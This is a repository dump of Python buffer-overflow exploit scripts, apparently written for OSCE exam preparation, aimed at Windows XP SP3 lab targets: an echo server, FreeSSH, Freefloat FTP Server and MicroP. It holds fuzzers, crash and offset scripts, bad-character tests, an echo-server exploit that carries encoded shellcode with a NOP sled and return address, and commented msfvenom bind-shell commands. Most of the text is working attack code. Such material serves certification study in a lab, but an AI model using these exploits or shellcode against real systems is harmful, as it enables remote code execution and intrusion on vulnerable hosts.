"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | 
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*1100 10 | buffer += ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 11 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 13 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 14 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 15 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 16 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xde\xdf" 17 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe") 18 | buffer += "B" * 400 19 | 20 | sock.send(buffer) 21 | 22 | sock.close() 23 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/echo_server_shellcode.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | shellcode = ("\xbf\x6d\x30\xa5\xa3\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" 10 | "\x53\x31\x78\x12\x83\xe8\xfc\x03\x15\x3e\x47\x56\x19\xd6\x05" 11 | "\x99\xe1\x27\x6a\x13\x04\x16\xaa\x47\x4d\x09\x1a\x03\x03\xa6" 12 | "\xd1\x41\xb7\x3d\x97\x4d\xb8\xf6\x12\xa8\xf7\x07\x0e\x88\x96" 13 | "\x8b\x4d\xdd\x78\xb5\x9d\x10\x79\xf2\xc0\xd9\x2b\xab\x8f\x4c" 14 | "\xdb\xd8\xda\x4c\x50\x92\xcb\xd4\x85\x63\xed\xf5\x18\xff\xb4" 15 | "\xd5\x9b\x2c\xcd\x5f\x83\x31\xe8\x16\x38\x81\x86\xa8\xe8\xdb" 16 | "\x67\x06\xd5\xd3\x95\x56\x12\xd3\x45\x2d\x6a\x27\xfb\x36\xa9" 17 | "\x55\x27\xb2\x29\xfd\xac\x64\x95\xff\x61\xf2\x5e\xf3\xce\x70" 18 | "\x38\x10\xd0\x55\x33\x2c\x59\x58\x93\xa4\x19\x7f\x37\xec\xfa" 19 | "\x1e\x6e\x48\xac\x1f\x70\x33\x11\xba\xfb\xde\x46\xb7\xa6\xb6" 20 | "\xab\xfa\x58\x47\xa4\x8d\x2b\x75\x6b\x26\xa3\x35\xe4\xe0\x34" 21 | "\x39\xdf\x55\xaa\xc4\xe0\xa5\xe3\x02\xb4\xf5\x9b\xa3\xb5\x9d" 22 | "\x5b\x4b\x60\x0b\x53\xea\xdb\x2e\x9e\x4c\x8c\xee\x30\x25\xc6" 23 | "\xe0\x6f\x55\xe9\x2a\x18\xfe\x14\xd5\x37\xa3\x91\x33\x5d\x4b" 24 | "\xf4\xec\xc9\xa9\x23\x25\x6e\xd1\x01\x1d\x18\x9a\x43\x9a\x27" 25 | "\x1b\x46\x8c\xbf\x90\x85\x08\xde\xa6\x83\x38\xb7\x31\x59\xa9" 26 | "\xfa\xa0\x5e\xe0\x6c\x40\xcc\x6f\x6c\x0f\xed\x27\x3b\x58\xc3" 27 | "\x31\xa9\x74\x7a\xe8\xcf\x84\x1a\xd3\x4b\x53\xdf\xda\x52\x16" 28 | "\x5b\xf9\x44\xee\x64\x45\x30\xbe\x32\x13\xee\x78\xed\xd5\x58" 29 | "\xd3\x42\xbc\x0c\xa2\xa8\x7f\x4a\xab\xe4\x09\xb2\x1a\x51\x4c" 30 | "\xcd\x93\x35\x58\xb6\xc9\xa5\xa7\x6d\x4a\xd5\xed\x2f\xfb\x7e" 31 | "\xa8\xba\xb9\xe2\x4b\x11\xfd\x1a\xc8\x93\x7e\xd9\xd0\xd6\x7b" 32 | "\xa5\x56\x0b\xf6\xb6\x32\x2b\xa5\xb7\x16") 33 | 34 | 35 | buffer = "\x90"*40 36 | buffer += shellcode 37 | buffer += "\x90"*(1036-40-len(shellcode)) 38 | buffer += "\x34\xf3\x22\x00" 39 | 40 | sock.send(buffer) 41 | 42 | sock.close() 43 | 
-------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_4/echo_server_badchars1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*1036 10 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 11 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 13 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 14 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 15 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 16 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 17 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 18 | buffer += "B" * 400 19 | 20 | sock.send(buffer) 21 | 22 | sock.close() 23 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_4/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | 
sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*2200 10 | 11 | sock.send(buffer) 12 | 13 | sock.close() 14 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/FreeSSH/freessh_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | import time 5 | 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | sock.connect(("172.16.73.129", 22)) 9 | 10 | message = sock.recv(1000) 11 | 12 | print message 13 | 14 | buffer = ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 15 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 17 | buffer += "A"*22000 18 | buffer += "\r\n" 19 | 20 | sock.send(buffer) 21 | time.sleep(5) 22 | sock.close() -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/FreeSSH/freessh_eip_b_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | import time 5 | 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | sock.connect(("172.16.73.129", 22)) 9 | 10 | message = sock.recv(1000) 11 | 12 | print message 13 | 14 | buffer = ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 15 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 17 | buffer += "A"*1055 18 | buffer += "B"*4 19 | buffer += "C"*21000 20 | buffer += "\r\n" 21 | 22 | sock.send(buffer) 23 | time.sleep(5) 24 | sock.close() 25 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_eip1.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit Find Offset 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | print banner 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = ( 18 | 19 | offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 20 | 21 | #nowjump 22 | #bufferandshellcode 23 | sploit = offset 24 | 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | try: 27 | print "\nDestroy them with lazers..." 
28 | s.connect(('172.16.73.129',21)) 29 | s.recv(1024) 30 | s.send('USER anonymous\r\n') 31 | s.recv(1024) 32 | s.send('PASS anonymous\r\n') 33 | s.recv(1024) 34 | s.send('MKD ' + sploit + '\r\n\n') 35 | s.recv(1024) 36 | s.send('QUIT\r\n') 37 | s.close 38 | print "\nFire in the hole! Go pick up the pieces!" 39 | except: 40 | print "ERROR! Shutting it dooooown.." 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 69413269 -> offset at 247 18 | offset = 'A'*247 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7c9d30d7 or \xd7\x30\x9d\x7c 21 | #nowjump = '\xd7\x30\x9d\x7c' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(366) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER anonymous\r\n') 33 | s.recv(1024) 34 | s.send('PASS anonymous\r\n') 35 | s.recv(1024) 36 | s.send('MKD ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 
43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit Fuzzer 10 | 1. python freefloat_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = ( 17 | 18 | offset = "A" *247 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER anonymous\r\n') 29 | s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | s.recv(1024) 32 | s.send('MKD ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 
39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/MicroP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/MicroP.exe -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars1.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars1.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars2.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars3.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars4.mppl: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars4.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt1.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt1.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt2.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt3.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt4.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt4.mppl -------------------------------------------------------------------------------- 
/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_crash.mppl", "wb") 4 | 5 | buffer = "A"*4000 6 | 7 | file.write(buffer) 8 | 9 | file.close() 10 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_b_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_b_overwrite.mppl", "wb") 4 | 5 | buffer= "A"*1276 6 | buffer+= "B"*4 7 | buffer+= "C"*2000 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars1.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars2.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars3.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars3.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars4.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | 